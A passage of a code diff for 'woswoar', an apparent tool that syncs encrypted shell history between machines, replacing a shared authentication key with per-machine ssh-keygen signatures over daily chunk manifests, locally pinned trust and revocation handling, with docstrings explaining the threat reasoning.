-    comparison, so the check cannot be turned into an oracle by timing it.
+
+def _spawn(
+    argv: list[str], data: bytes | None = None, pass_fds: tuple[int, ...] = ()
+) -> subprocess.CompletedProcess[bytes]:
+    """Run a tool and hand back the result, judging nothing.
+
+    The three callers want different things from a nonzero exit -- age's is an
+    `AgeError`, ssh-keygen's a `SigningError`, and `verify`'s is simply "no" --
+    so the judgement is theirs. What they agree on is the invocation, and that
+    is here so the timeout, the capture and `check=False` cannot drift apart.
     """
-    return hmac.compare_digest(tag(key, data), expected)
+    return subprocess.run(
+        argv, input=data, capture_output=True, check=False, timeout=_TIMEOUT, pass_fds=pass_fds
+    )
+
+
+def _run_signer(argv: list[str], data: bytes | None = None) -> bytes:
+    try:
+        result = _spawn(argv, data)
+    except FileNotFoundError as exc:
+        raise SigningError(f"{argv[0]} is not installed") from exc
+    except subprocess.TimeoutExpired as exc:  # pragma: no cover - needs a hung ssh-keygen
+        raise SigningError(f"{argv[0]} timed out after {_TIMEOUT}s") from exc
+    if result.returncode != 0:
+        raise SigningError(
+            result.stderr.decode("utf-8", errors="replace").strip() or "signing failed"
+        )
+    return result.stdout
+
+
+def sign(data: bytes, key: Path, namespace: str) -> bytes:
+    """Sign ``data`` with this machine's key, returning the armoured signature.
+
+    The data goes in on stdin and the signature comes back on stdout, so nothing
+    being signed is written to a temporary file. ``-f`` is the one real path any
+    of this needs: ssh-keygen will not take a private key on an inherited
+    descriptor -- ``-f /dev/fd/N`` fails with "Couldn't load public key", which
+    is what stalled the first attempt at this (PR #28). The path it is given is
+    woswoar's own 0600 file in woswoar's own config directory, so the rule that
+    matters -- never name a file of the *user's* that a sandboxed tool cannot
+    open -- is intact.
+    """
+    require_signing()
+    return _run_signer([SSH_KEYGEN, "-Y", "sign", "-q", "-f", str(key), "-n", namespace], data=data)
+
+
+def verify(data: bytes, signature: bytes, verify_key: str, namespace: str) -> bool:
+    """Whether ``signature`` is ``principal``'s signature over ``data``.
+
+    Returns a bool rather than raising, because a signature that does not verify
+    is an ordinary fact about a chunk -- someone published one your machines did
+    not write -- and not a failure of the tool.
+
+    Both inputs reach ssh-keygen on inherited pipes as ``/dev/fd/N``, the same
+    way `decrypt_with_secret` hands age an identity: the allowed-signers list is
+    built here from the single key the caller already decided to trust, so there
+    is no file of trusted keys on disk to be edited behind woswoar's back, and
+    no temporary file to clean up. The question asked is exactly "did *this* key
+    sign this?", never "did anyone in some list sign this?".
+
+    ssh-keygen's own principal matching does no work here and is not asked to:
+    the allowed-signers line is built from the key, so the principal always
+    matches itself. There was an argument for the caller to pass one anyway, to
+    make ssh-keygen's errors readable -- but this captures its output and reads
+    only the exit status, so nobody ever saw them. Binding a signature to a
+    machine is the caller's job, done in the bytes it signs.
+
+    ``namespace`` is not decoration: ssh-keygen refuses a signature made under a
+    different one, which is what stops a signature meant for one purpose being
+    replayed as another. The caller owns it, because the caller owns the format
+    it versions.
+    """
+    require_signing()
+    allowed = f"{_PRINCIPAL} {verify_key}\n".encode()
+    with _as_fd(allowed) as allowed_fd, _as_fd(signature) as signature_fd:
+        result = _spawn(
+            [
+                SSH_KEYGEN,
+                "-Y",
+                "verify",
+                "-q",
+                "-f",
+                f"/dev/fd/{allowed_fd}",
+                "-I",
+                _PRINCIPAL,
+                "-n",
+                namespace,
+                "-s",
+                f"/dev/fd/{signature_fd}",
+            ],
+            data,
+            (allowed_fd, signature_fd),
+        )
+    return result.returncode == 0
+
+
+@contextmanager
+def _as_fd(data: bytes) -> Iterator[int]:
+    """``data`` as a readable ``/dev/fd/N``, for a subprocess to open.
+
+    How both tools are handed key material without a path: age gets an identity
+    this way, ssh-keygen an allowed-signers line and a signature. The rule it
+    serves is the same one -- never name a file a sandboxed tool might not be
+    able to open, and never put a secret in a temporary file.
+
+    Every payload is small: an identity, an allowed-signers line, an armoured
+    signature, a few hundred bytes each. So writing and closing before the child
+    starts reading cannot fill the pipe buffer and deadlock.
+    """
+    read_fd, write_fd = os.pipe()
+    try:
+        os.write(write_fd, data)
+        os.close(write_fd)
+        write_fd = -1
+        yield read_fd
+    finally:
+        if write_fd != -1:
+            os.close(write_fd)
+        os.close(read_fd)
 
 
 def selftest() -> str:

--- a/woswoar/deps.py
+++ b/woswoar/deps.py
@@ -14,16 +14,23 @@ from typing import NamedTuple
 
 
 class Tool(NamedTuple):
-    #: Binary on PATH. Also the package name on every distro handled below --
-    #: if that ever stops being true, this grows a per-family mapping rather
-    #: than the callers learning about packaging.
+    #: Binary on PATH, and the package name wherever `packages` does not say
+    #: otherwise.
     name: str
     #: Filled into "needed for ...", so it reads as a reason, not a label.
     needed_for: str
+    #: Distro family -> package name, for the tools whose binary and package are
+    #: not called the same thing. `name`'s comment used to promise this mapping
+    #: would appear rather than callers learning about packaging; ssh-keygen is
+    #: what made it necessary, since it ships inside openssh-client(s).
+    packages: tuple[tuple[str, str], ...] = ()
 
     @property
     def present(self) -> bool:
         return shutil.which(self.name) is not None
+
+    def package(self, family: str) -> str:
+        return dict(self.packages).get(family, self.name)
 
 
 #: fzf is listed first because it is the one whose absence breaks the feature
@@ -31,8 +38,19 @@ class Tool(NamedTuple):
 FZF = Tool("fzf", "the Ctrl-R picker")
 AGE = Tool("age", "encrypting history before it is synced")
 GIT = Tool("git", "moving encrypted history between machines")
+SSH_KEYGEN = Tool(
+    "ssh-keygen",
+    "signing history, so machines can tell which one wrote it",
+    packages=(
+        ("fedora", "openssh-clients"),
+        ("rhel", "openssh-clients"),
+        ("centos", "openssh-clients"),
+        ("debian", "openssh-client"),
+        ("ubuntu", "openssh-client"),
+    ),
+)
 
-TOOLS = (FZF, AGE, GIT)
+TOOLS = (FZF, AGE, GIT, SSH_KEYGEN)
 
 #: Distro family -> the command that installs a package there. Deliberately
 #: short: printing a confidently wrong command for a distro nobody tested is
@@ -68,8 +86,8 @@ def _os_release(path: Path | None = None) -> dict[str, str]:
     return values
 
 
-def installer(path: Path | None = None) -> str:
-    """The install command for this machine, or ``""`` if we do not know it.
+def family(path: Path | None = None) -> str:
+    """This machine's distro family, or ``""`` if it is not one we know.
 
     ``ID_LIKE`` is consulted after ``ID`` so derivatives are covered without
     naming each one: Linux Mint reports ``ID=linuxmint ID_LIKE=ubuntu``.
@@ -78,8 +96,13 @@ def installer(path: Path | None = None) -> str:
     candidates = [release.get("ID", ""), *release.get("ID_LIKE", "").split()]
     for candidate in candidates:
         if candidate in _INSTALLERS:
-            return _INSTALLERS[candidate]
+            return candidate
     return ""
+
+
+def installer(path: Path | None = None) -> str:
+    """The install command for this machine, or ``""`` if we do not know it."""
+    return _INSTALLERS.get(family(path), "")
 
 
 def missing(tools: tuple[Tool, ...] = TOOLS) -> list[Tool]:
@@ -87,8 +110,13 @@ def missing(tools: tuple[Tool, ...] = TOOLS) -> list[Tool]:
 
 
 def advice(tools: list[Tool] | tuple[Tool, ...], path: Path | None = None) -> str:
-    """A ready-to-paste install line for ``tools``, or the honest fallback."""
-    names = " ".join(tool.name for tool in tools)
+    """A ready-to-paste install line for ``tools``, or the honest fallback.
+
+    Package names, not binary names: ``sudo dnf install ssh-keygen`` is a
+    command that fails, and a fix that does not work is worse than no fix.
+    """
+    where = family(path)
+    names = " ".join(dict.fromkeys(tool.package(where) for tool in tools))
     command = installer(path)
     if command:
         return f"{command} {names}"

--- a/woswoar/store.py
+++ b/woswoar/store.py
@@ -24,13 +24,10 @@ _LOGS = "logs"
 _HISTORY = "history"
 _HOSTS = "hosts"
 _KEYS = "keys"
+_MANIFESTS = "manifests"
 _LOG_SUFFIX = ".tsv"
 _CHUNK_SUFFIX = ".age"
 _NAME_FILE = ".name"
-
-#: Mirrors crypto.TAG_BYTES. Kept here as the layout constant it is, so the
-#: framing above does not make store import crypto.
-_TAG_BYTES = 32
 
 RECIPIENTS = "recipients.txt"
 GITATTRIBUTES = ".gitattributes"
@@ -433,43 +430,48 @@ def name_seal(machine_id: str) -> Path:
     return repo_host_dir(machine_id) / "name.age"
 
 
-def mac_key_file() -> Path:
-    """The repo-wide authentication key, sealed to every recipient.
+def signing_key_file() -> Path:
+    """This machine's signing key. Local, and never published or synced.
 
-    One file for the whole history rather than one per host or per day: it
-    authenticates *the set of enrolled machines*, not an individual one, so
-    there is nothing to split it by. It is sealed exactly like a day key, which
-    means `grant` already re-seals it to a newly enrolled machine and a machine
-    that has not been granted access yet simply cannot open it -- the same state,
-    with the same remedy, as history it cannot decrypt.
+    In the config directory beside the age identity, not in the repo: the public
+    half is what other machines need, and the private half is the one thing that
+    makes a revoked machine's signatures worthless to it -- so it is also the one
+    thing that must never be sealed to anybody, however trusted.
     """
-    return history_dir() / "mac.age"
+    return config_dir() / "signing_key"
 
 
-def frame_chunk(sealed: bytes, tag: bytes) -> bytes:
-    """One chunk file: a fixed-width authentication tag, then the ciphertext.
+def signer_public(machine_id: str) -> Path:
+    """A host's published verify key, and the recipient that owns the host.
 
-    A prefix rather than a sibling file, so that everything which answers "what
-    is a chunk" keeps working unchanged -- `is_chunk_path`, the ``*.age`` glob
-    in `GITATTRIBUTES`, `iter_chunks`, and the CI invariant that no chunk is
-    ever rewritten. A second file per chunk would also have doubled the file
-    count that `compact` exists to hold down.
+    Two lines, and the second is why this file exists at all rather than the
+    verify key living in `recipients.txt`: revocation names an *age recipient*,
+    while chunks live under a *host id*, and nothing else in the repo joins the
+    two. It could not go in `recipients.txt` either -- an age recipient may
+    itself be an SSH key, `ssh-ed25519 AAAA... comment`, so a second key in that
+    field could not be told from the first one's comment.
 
-    Fixed width, so splitting needs no delimiter and no length field.
+    Anyone who can push can rewrite this, so nothing here is believed. It is
+    what `trust` *shows* a human, once; what is believed afterwards is the copy
+    pinned in local state.
     """
-    return tag + sealed
+    return repo_host_dir(machine_id) / "signer.pub"
 
 
-def split_chunk(blob: bytes) -> tuple[bytes, bytes]:
-    """Inverse of :func:`frame_chunk`: ``(sealed, tag)``.
+def day_manifest(machine_id: str, day: str) -> Path:
+    """The signed list of a host-day's chunks.
 
-    Raises :class:`ValueError` on anything too short to be framed, which callers
-    treat exactly like a tag that does not match: an unauthenticated chunk and a
-    malformed one are the same refusal.
+    Deliberately not one signature per chunk, which is what made the first
+    attempt at this unusable: a signature costs a subprocess, and a machine
+    waiting for `grant` re-checks everything it has not merged on every timer
+    tick. One manifest per host-day turns that from once per chunk into once per
+    day -- about 3.6 s over a year of three machines, against nearly two minutes.
+
+    Rewritten as the day goes on, so it lives outside the `hosts/<id>/<day>/`
+    chunk directories that `is_chunk_path` marks write-once. Only the owning
+    host ever writes it, so it cannot conflict, and it needs no merge driver.
     """
-    if len(blob) <= _TAG_BYTES:
-        raise ValueError("chunk carries no authentication tag")
-    return blob[_TAG_BYTES:], blob[:_TAG_BYTES]
+    return repo_host_dir(machine_id) / _MANIFESTS / day
 
 
 def day_key(machine_id: str, day: str) -> Path:

--- a/woswoar/sync.py
+++ b/woswoar/sync.py
@@ -16,11 +16,16 @@ The shape of this, and why:
   of chunks.
 - Each chunk is decrypted exactly once, ever. The plaintext lands in ``logs/``
   and the cache picks it up from there.
+- Each host signs a manifest of its own chunks, per day, with a key only it
+  holds. That is what makes a chunk attributable to one machine rather than to
+  the fleet, and so what lets `revoke` stop a machine publishing as well as
+  reading. See `_manifest_body` and `_trusted_signer`.
 """
 
 from __future__ import annotations
 
 import fcntl
+import hashlib
 import subprocess
 import time
 import zlib
@@ -63,17 +68,42 @@ class Report:
     #: "<host>/<day>" entries that could not be authenticated, and so were
     #: refused rather than merged.
     #:
-    #: One category on purpose: a missing tag and a wrong tag are the same
-    #: answer. Splitting them on the shape of the bytes was tried and reverted,
-    #: because an attacker omits the tag too -- so the split told the reassuring
-    #: story for exactly the case that most needed reporting.
+    #: One category on purpose: a manifest that is missing, malformed, signed by
+    #: the wrong key, or signed for another day are the same answer, as is a
+    #: chunk whose digest it does not list. Splitting them on the shape of the
+    #: bytes was tried and reverted, because an attacker can produce any of those
+    #: shapes at will -- so the split told the reassuring story for exactly the
+    #: case that most needed reporting.
     unauthenticated: set[str] = field(default_factory=set)
-    #: True when this machine cannot open the repo key yet, so it can neither
-    #: publish nor read. Recording carries on regardless; `grant` unblocks it.
-    needs_grant: bool = False
-    #: ...unless this machine's own key was revoked, in which case `grant` never
-    #: will, and saying otherwise sends someone to another machine to run a
-    #: command that cannot help. Only meaningful with `needs_grant`.
+    #: Hosts publishing history under a signing key nobody here has accepted.
+    #: Not an error and usually not an attack: it is what a machine enrolled
+    #: since this one last looked is *supposed* to look like. `woswoar trust`.
+    untrusted: set[str] = field(default_factory=set)
+    #: Hosts now publishing under a different key than the one pinned here.
+    #: Never resolved silently: it is either a re-enrolled machine or someone
+    #: rewriting the repo, and nothing available here can tell which.
+    changed_signer: set[str] = field(default_factory=set)
+    #: Hosts whose pin was dropped because a tombstone withdrew them.
+    unpinned: set[str] = field(default_factory=set)
+    #: Days of this machine's own history it could not extend, because the
+    #: manifest already there is one it cannot verify. Nothing is published for
+    #: them until the manifest is put right, which beats signing a replacement
+    #: that silently disowns everything published earlier that day.
+    unsignable: set[str] = field(default_factory=set)
+    #: "<day>/<name>" chunks sitting under *this* machine's own id that it never
+    #: published. Nothing else would ever look at them -- `merge` skips our own
+    #: id -- and they are deliberately not swept into a manifest we sign.
+    foreign: set[str] = field(default_factory=set)
+    #: True when this machine's own key was withdrawn. It publishes nothing --
+    #: nobody would accept it -- and reads nothing new. Recording carries on;
+    #: `grant` cannot undo it, and saying otherwise would send someone to another
+    #: machine to run a command that cannot help.
+    #:
+    #: There used to be a `needs_grant` beside this, for a machine that could not
+    #: open the shared authentication key and so could neither publish nor read.
+    #: With per-machine signing there is no such state: publishing needs nothing
+    #: from anyone, and a machine still waiting for `grant` simply reports the
+    #: days it cannot read, like any other unreadable history.
     revoked: bool = False
 
 
@@ -181,6 +211,10 @@ def _append_recipient_line(line: str) -> None:
     store.write_atomic(path, f"{existing}{separator}{line}\n".encode())
 
 
+def _own_recipient(known: Machine) -> str:
+    return crypto.recipient_for(identity_path(known)).strip()
+
+
 def _this_machine_revoked(known: Machine) -> bool:
     """Whether this machine is the one that was withdrawn.
 
@@ -190,7 +224,7 @@ def _this_machine_revoked(known: Machine) -> bool:
     no longer decrypt anything to be told with.
     """
     try:
-        return crypto.recipient_for(identity_path(known)).strip() in revoked_keys()
+        return _own_recipient(known) in revoked_keys()
     except (WoswoarError, OSError):
         return False
 
@@ -277,6 +311,12 @@ class State:
     #: answer, and a record kept in the repo could be edited by exactly the
     #: attacker the confirmation exists to catch.
     granted: list[str] = field(default_factory=list)
+    #: host id -> the signing key this machine accepts history from that host
+    #: under. *The* trust anchor, and local for the reason the rest of this class
+    #: is: everything in the repo can be rewritten by anyone who can push,
+    #: `hosts/<id>/signer.pub` included, so the key a host is held to has to be
+    #: remembered somewhere the remote cannot reach.
+    signers: dict[str, str] = field(default_factory=dict)
 
     @classmethod
     def load(cls) -> State:
@@ -284,6 +324,7 @@ class State:
         exported = raw.get("exported", {})
         merged = raw.get("merged", {})
         granted = raw.get("granted", [])
+        signers = raw.get("signers", {})
         if not isinstance(exported, dict) or not isinstance(merged, dict):
             return cls()
         return cls(
@@ -292,12 +333,23 @@ class State:
             # A malformed list costs the prompt its memory, which shows every
             # machine as new -- the safe direction to be wrong in.
             granted=[str(k) for k in granted] if isinstance(granted, list) else [],
+            # And a malformed map costs every pin, which refuses every host until
+            # a human re-runs `trust` -- also the safe direction, and loud,
+            # because `sync` reports the untrusted hosts rather than skipping on.
+            signers={str(k): str(v) for k, v in signers.items()}
+            if isinstance(signers, dict)
+            else {},
         )
 
     def save(self) -> None:
         store.save_json(
             store.state_file(),
-            {"exported": self.exported, "merged": self.merged, "granted": self.granted},
+            {
+                "exported": self.exported,
+                "merged": self.merged,
+                "granted": self.granted,
+                "signers": self.signers,
+            },
         )
 
 
@@ -364,24 +416,53 @@ def identity_status(known: Machine) -> IdentityStatus:
     return IdentityStatus(True, f"identity {path}")
 
 
-def repo_key_status(known: Machine) -> IdentityStatus:
-    """Whether this machine can authenticate history, for `doctor` to report.
+def signing_status(known: Machine) -> IdentityStatus:
+    """Whether this machine can sign what it publishes, for `doctor` to report.
 
     Lives here rather than in `doctor` for the same reason `identity_status`
-    does: the judgement is testable and stated once. It is worth surfacing
-    because a machine that cannot open this key publishes *nothing* -- it keeps
-    recording, looks healthy, and says so only on a timer's stderr.
+    does: the judgement is testable and stated once. Worth surfacing because a
+    machine that cannot sign publishes history no peer will ever accept -- it
+    keeps recording, looks healthy, and says so only on a timer's stderr.
+
+    Checked by actually signing and verifying rather than by looking at the
+    file, the same argument `why_unusable` makes about age: what matters is
+    whether an unattended sync will work, not what the key file looks like.
     """
-    path = store.mac_key_file()
+    if not crypto.signing_available():
+        return IdentityStatus(False, "ssh-keygen is not installed - history cannot be signed")
+    path = store.signing_key_file()
+    if not path.is_file():
+        return IdentityStatus(False, f"{path} is missing - it is created by 'woswoar init'")
+    try:
+        verify_key = crypto.signing_public(path)
+        probe = b"woswoar signing selftest"
+        if not crypto.verify(
+            probe, crypto.sign(probe, path, _MANIFEST_MAGIC), verify_key, _MANIFEST_MAGIC
+        ):
+            return IdentityStatus(False, f"{path} signs, but the signature does not verify")
+    except (WoswoarError, OSError) as exc:
+        return IdentityStatus(False, f"{path} cannot sign: {exc}")
+    return IdentityStatus(True, f"{path} ({crypto.fingerprint(verify_key)})")
+
+
+def trust_status(known: Machine) -> IdentityStatus:
+    """How many machines publishing here this one accepts, for `doctor`.
+
+    Beside `signing_status` and `identity_status` for the reason their
+    docstrings give: the judgement is testable and stated once, rather than
+    derived inline in the CLI where only a test that greps stdout could reach
+    it. Withdrawn hosts are subtracted, so a revoked machine never reads as
+    accepted just because no sync has pruned the pin yet.
+    """
     if not is_repo():
         return IdentityStatus(True, "no history repo yet")
-    if not path.is_file():
-        return IdentityStatus(False, f"{path} is missing - re-run 'woswoar init'")
-    try:
-        mac_key(known)
-    except (crypto.AgeError, SyncError) as exc:
-        return IdentityStatus(False, f"cannot be opened ({exc}) - run 'woswoar grant' elsewhere")
-    return IdentityStatus(True, str(path))
+    accepted = accepted_hosts(State.load())
+    others = [host for host in store.repo_hosts() if host != known.id]
+    waiting = [host for host in others if host not in accepted]
+    detail = f"{len(others) - len(waiting)} of {len(others)} other machine(s) accepted"
+    if waiting:
+        detail += " - run 'woswoar trust' to accept the rest"
+    return IdentityStatus(not waiting, detail)
 
 
 def day_public_key(known: Machine, day: str) -> str:
@@ -401,34 +482,6 @@ def day_public_key(known: Machine, day: str) -> str:
     return identity.public
 
 
-def mac_key(known: Machine) -> bytes:
-    """The repo's authentication key. Raises if this machine cannot open it.
-
-    Sealed to every recipient, so holding it is exactly "being one of the
-    enrolled machines" -- which is the property every chunk is checked against.
-    Someone who can push to the repo but holds no enrolled identity cannot open
-    it, and so cannot produce a tag any machine will accept.
-
-    Opens, never creates. `day_public_key` mints on demand safely because a day
-    key lives under this host's own id, a path nobody else writes; this file is
-    one shared path at the repo root, so two machines minting it on the same
-    timer tick would each tag chunks with a key the other will never hold, and
-    `.gitattributes` marks ``*.age -merge`` -- so the rebase conflicts and the
-    timer replays that conflict forever. Creation happens once, in `initialise`.
-    """
-    path = store.mac_key_file()
-    if not path.is_file():
-        raise crypto.AgeError(f"no authentication key at {path}")
-    return crypto.decrypt_with_file(path.read_bytes(), identity_path(known))
-
-
-def create_mac_key(known: Machine) -> bytes:
-    """Mint the repo's authentication key. Only `initialise` may call this."""
-    key = crypto.new_mac_key()
-    store.write_atomic(store.mac_key_file(), crypto.encrypt_to_recipients(key, recipients()))
-    return key
-
-
 def open_day_key(known: Machine, host_id: str, day: str) -> str:
     """Recover a day's private identity so its chunks can be read."""
     sealed_path = store.day_key(host_id, day)
@@ -437,6 +490,295 @@ def open_day_key(known: Machine, host_id: str, day: str) -> str:
     except OSError as exc:
         raise SyncError(f"missing day key {sealed_path}") from exc
     return crypto.decrypt_with_file(sealed, identity_path(known)).decode("utf-8")
+
+
+# ---------------------------------------------------------------------------
+# Who a host claims to be. Untrusted: anyone who can push can rewrite this.
+# ---------------------------------------------------------------------------
+
+
+class Signer(NamedTuple):
+    """What ``hosts/<id>/signer.pub`` says about a host.
+
+    Both halves matter and neither is believed on sight. ``verify_key`` is what
+    `trust` shows a human and pins; ``owner`` is the age recipient that claims
+    this host directory, and it exists so a tombstone -- which names a recipient
+    -- can be turned into "stop accepting this host's chunks". Nothing else in
+    the repo joins a host id to a recipient.
+    """
+
+    verify_key: str
+    owner: str
+
+
+def read_signer(host_id: str) -> Signer | None:
+    try:
+        lines = store.signer_public(host_id).read_text(encoding="utf-8").splitlines()
+    except OSError:
+        return None
+    if len(lines) < 2 or not lines[0].strip() or not lines[1].strip():
+        return None
+    return Signer(lines[0].strip(), lines[1].strip())
+
+
+def publish_signer(known: Machine) -> bool:
+    """Make sure this host's published signer file says what is true.
+
+    Guarded, and the guard is not only tidiness: working out the owning
+    recipient means reading an identity, which for a dedicated age key is an
+    `age-keygen` subprocess. This runs on a one-minute timer, and the file
+    changes about once in a machine's life. Returns whether it wrote.
+    """
+    verify_key = signing_public()
+    current = read_signer(known.id)
+    if current is not None and current.verify_key == verify_key:
+        return False
+    store.write_atomic(
+        store.signer_public(known.id),
+        f"{verify_key}\n{_own_recipient(known)}\n".encode(),
+    )
+    return True
+
+
+def signing_public() -> str:
+    """This machine's verify key, creating the signing key on first use.
+
+    One spelling of "our own verify key". `export`, `compact` and
+    `signing_status` each had their own, which is three places to change if the
+    key ever moves.
+    """
+    path = store.signing_key_file()
+    if not path.is_file():
+        return crypto.generate_signing_key(path)
+    return crypto.signing_public(path)
+
+
+class Candidate(NamedTuple):
+    """A machine `trust` could accept, as a human needs to see it.
+
+    Shaped like `Reader`, and for the same reason: everything a confirmation
+    says about a machine is decided here rather than at the print, so a test can
+    reach it without grepping stdout, and so printing the attacker-written name
+    unquoted is not reachable by forgetting a ``!r``.
+    """
+
+    host_id: str
+    verify_key: str
+    #: Free text from the recipient line. A name, not an identity.
+    label: str
+    #: Derived from the key and so not chooseable. This is the identity.
+    fingerprint: str
+    #: What this machine currently accepts from that host, if anything. Set and
+    #: different from `verify_key` means the key changed, which is never
+    #: resolved without a human saying which one is right.
+    pinned: str | None
+    #: The fingerprint of that, for a prompt that has to show both.
+    pinned_fingerprint: str
+
+    @property
+    def changed(self) -> bool:
+        return self.pinned is not None and self.pinned != self.verify_key
+
+    def display_name(self) -> str:
+        """The label, in a form that cannot rearrange the line it is on.
+
+        `Reader.display_name` explains why this is a method rather than a rule
+        the caller has to remember.
+        """
+        return repr(self.label)
+
+
+def trust_candidates() -> list[Candidate]:
+    """Every other machine publishing here, with what this one accepts from it.
+
+    Fetches first, for the same reason `readers` does: the whole point is a
+    machine that appeared since this one last looked.
+    """
+    with lock():
+        if has_remote():
+            _fetch_and_rebase()
+
+        known = store.machine()
+        state = State.load()
+        names = {key: label for key, label in _labelled_recipients()}
+
+        out: list[Candidate] = []
+        for host_id in store.repo_hosts():
+            if host_id == known.id:
+                continue
+            signer = read_signer(host_id)
+            if signer is None:
+                continue
+            # Only hosts whose owning recipient is *live* are offered. That
+            # covers both cases in one test, because `_labelled_recipients`
+            # already subtracts tombstoned keys: a withdrawn machine is not in
+            # `names`, and neither is a host nothing ties to a recipient -- which
+            # must also stay unacceptable, or the tombstone that would stop it
+            # later would have nothing to act on.
+            if signer.owner not in names:
+                continue
+            pinned = state.signers.get(host_id)
+            out.append(
+                Candidate(
+                    host_id=host_id,
+                    verify_key=signer.verify_key,
+                    label=names[signer.owner],
+                    fingerprint=crypto.fingerprint(signer.verify_key),
+                    pinned=pinned,
+                    pinned_fingerprint=crypto.fingerprint(pinned) if pinned else "",
+                )
+            )
+        return out
+
+
+def trust(candidates: list[Candidate]) -> None:
+    """Accept these machines here. Local only: no repo write, no push.
+
+    The one operation that *adds* trust, and it is deliberately unable to touch
+    the repository. What a machine accepts is the one thing that cannot live in
+    a place anyone with push access can rewrite, so it lives in `state.json` and
+    is put there by a human sitting at the machine it applies to.
+    """
+    state = State.load()
+    for candidate in candidates:
+        state.signers[candidate.host_id] = candidate.verify_key
+    state.save()
+
+
+def withdrawn_hosts(state: State) -> set[str]:
+    """Pinned hosts whose owning recipient has since been tombstoned.
+
+    Asked here rather than left to whoever remembers: `doctor` read the pins
+    directly and reported a withdrawn machine as accepted right up until the
+    next sync happened to prune it.
+    """
+    withdrawn = revoked_keys()
+    if not withdrawn:
+        return set()
+    out = set()
+    for host_id in state.signers:
+        signer = read_signer(host_id)
+        if signer is not None and signer.owner in withdrawn:
+            out.add(host_id)
+    return out
+
+
+def accepted_hosts(state: State) -> set[str]:
+    """The hosts this machine accepts history from, right now."""
+    return set(state.signers) - withdrawn_hosts(state)
+
+
+def apply_withdrawals(state: State, report: Report) -> None:
+    """Drop the pin of every host whose owning recipient has been tombstoned.
+
+    The one place repo state is allowed to change what this machine trusts, and
+    it may only ever *remove*. That asymmetry is what makes `revoke` work across
+    a fleet without a human on each machine: adding trust needs a person,
+    because a repo anyone can push to could otherwise introduce a machine; but
+    dropping it can only ever cause a refusal, never an injection, so a
+    withdrawal anybody publishes is safe to act on immediately.
+
+    Sticky, because the pin is local: deleting the tombstone afterwards does not
+    put the pin back, and `trust` refuses a withdrawn key outright.
+    """
+    for host_id in sorted(withdrawn_hosts(state)):
+        del state.signers[host_id]
+        report.unpinned.add(host_id)
+
+
+# ---------------------------------------------------------------------------
+# Manifests: which chunks a host says are its own, signed so nobody else can say
+# it. The whole of chunk authenticity rests on this.
+# ---------------------------------------------------------------------------
+
+#: First token of a manifest body, and the ssh-keygen signature namespace, which
+#: are deliberately the same string. It is *inside the signed bytes* and also the
+#: domain the signature is made in, so a future manifest shape gets one new value
+#: and old signatures stop verifying against it twice over -- rather than a
+#: version check somebody has to remember to write.
+_MANIFEST_MAGIC = "woswoar-manifest-v1"
+
+#: Separates the armoured signature from the bytes it covers. The signature is
+#: in the same file as the body, not beside it, so `write_atomic` makes the two
+#: impossible to disagree -- a detached pair has a window where one has landed
+#: and the other has not, and during that window a real chunk looks forged.
+_MANIFEST_SEPARATOR = "\n\n"
+
+
+def digest_of(data: bytes) -> str:
+    """The digest a manifest records for a chunk."""
+    return hashlib.sha256(data).hexdigest()
+
+
+def _manifest_header(host_id: str, day: str) -> str:
+    """The line that binds a manifest to one host and one day.
+
+    Built in one place and compared in another, so the round trip cannot be
+    broken from one side only.
+    """
+    return f"{_MANIFEST_MAGIC} {host_id} {day}"
+
+
+def _manifest_body(host_id: str, day: str, digests: dict[str, str]) -> str:
+    """The signed part of a manifest: what this host claims it wrote that day.
+
+    The header names the host and the day, so a genuine manifest cannot be
+    lifted to another host's directory or another date and still verify --
+    ssh-keygen's own principal matching cannot do that job (see
+    `crypto.verify`), so it is done here, in the bytes the signature covers.
+
+    Sorted, so the same set of chunks always produces byte-identical output and
+    a sync that adds nothing rewrites nothing.
+    """
+    lines = [_manifest_header(host_id, day)]
+    lines += [f"{name} {digests[name]}" for name in sorted(digests)]
+    return "\n".join(lines) + "\n"
+
+
+def write_manifest(known: Machine, day: str, digests: dict[str, str]) -> None:
+    """Sign this host's chunk list for ``day`` and write it."""
+    body = _manifest_body(known.id, day, digests)
+    signature = crypto.sign(body.encode("utf-8"), store.signing_key_file(), _MANIFEST_MAGIC)
+    blob = signature.decode("utf-8").strip() + _MANIFEST_SEPARATOR + body
+    store.write_atomic(store.day_manifest(known.id, day), blob.encode("utf-8"))
+
+
+def read_manifest(host_id: str, day: str, verify_key: str) -> dict[str, str]:
+    """The digests ``host_id`` signed for ``day``, or ``{}`` if it did not.
+
+    Empty rather than an exception for an unsigned, malformed, mis-signed or
+    mis-addressed manifest, because callers do the same thing with all of them:
+    every chunk of that day goes unverified and is refused. Distinguishing them
+    would be distinguishing a truthful failure from an attacker's, which is
+    exactly the split #29 tried for chunk tags and reverted -- an attacker can
+    produce any of these shapes at will.
+    """
+    try:
+        blob = store.day_manifest(host_id, day).read_text(encoding="utf-8")
+    except OSError:
+        return {}
+
+    signature, separator, body = blob.partition(_MANIFEST_SEPARATOR)
+    if not separator:
+        return {}
+    if not crypto.verify(
+        body.encode("utf-8"), signature.encode("utf-8"), verify_key, _MANIFEST_MAGIC
+    ):
+        return {}
+
+    lines = body.splitlines()
+    # Checked *after* the signature, so this only ever parses bytes the host's
+    # own key vouched for. The header binding is the point: without it a
+    # manifest signed for one day would verify for every other day.
+    if not lines or lines[0] != _manifest_header(host_id, day):
+        return {}
+
+    digests: dict[str, str] = {}
+    for line in lines[1:]:
+        name, _, value = line.partition(" ")
+        if name and value:
+            digests[name] = value
+    return digests
 
 
 # ---------------------------------------------------------------------------
@@ -474,27 +816,86 @@ def unpack(blob: bytes) -> bytes:
     return zlib.decompress(blob)
 
 
-def export(known: Machine, state: State, report: Report, now: int, mac: bytes) -> None:
-    """Seal each log file's new lines into a fresh chunk, and tag it.
+def export(known: Machine, state: State, report: Report, now: int) -> None:
+    """Seal each log file's new lines into a fresh chunk, and sign the day's list.
 
-    The tag covers the sealed bytes, so a reader authenticates a chunk before
-    decrypting it.
+    The manifest is built by **extending the one this machine last signed**,
+    never by listing the day's directory, and that is a security property rather
+    than an optimisation.
+
+    `merge` skips this host's own id, so a chunk somebody else planted under it
+    is the one thing nothing here ever inspects. Listing the directory would
+    sweep such a chunk into a manifest *this machine signs*, laundering it into
+    something every peer believes -- without even the `compact` run that
+    `open_chunk` was written to guard. Extending a list we already signed makes
+    a chunk we did not write unrepresentable in a manifest we do sign.
+
+    The signature covers the whole day's list every time, so a manifest is a
+    complete statement of what this host published that day, not a delta.
     """
+    verify_key = signing_public()
+
+    # The tails are read first, so the loop below runs only for days that
+    # actually gained lines. It used to run for every day of local history, and
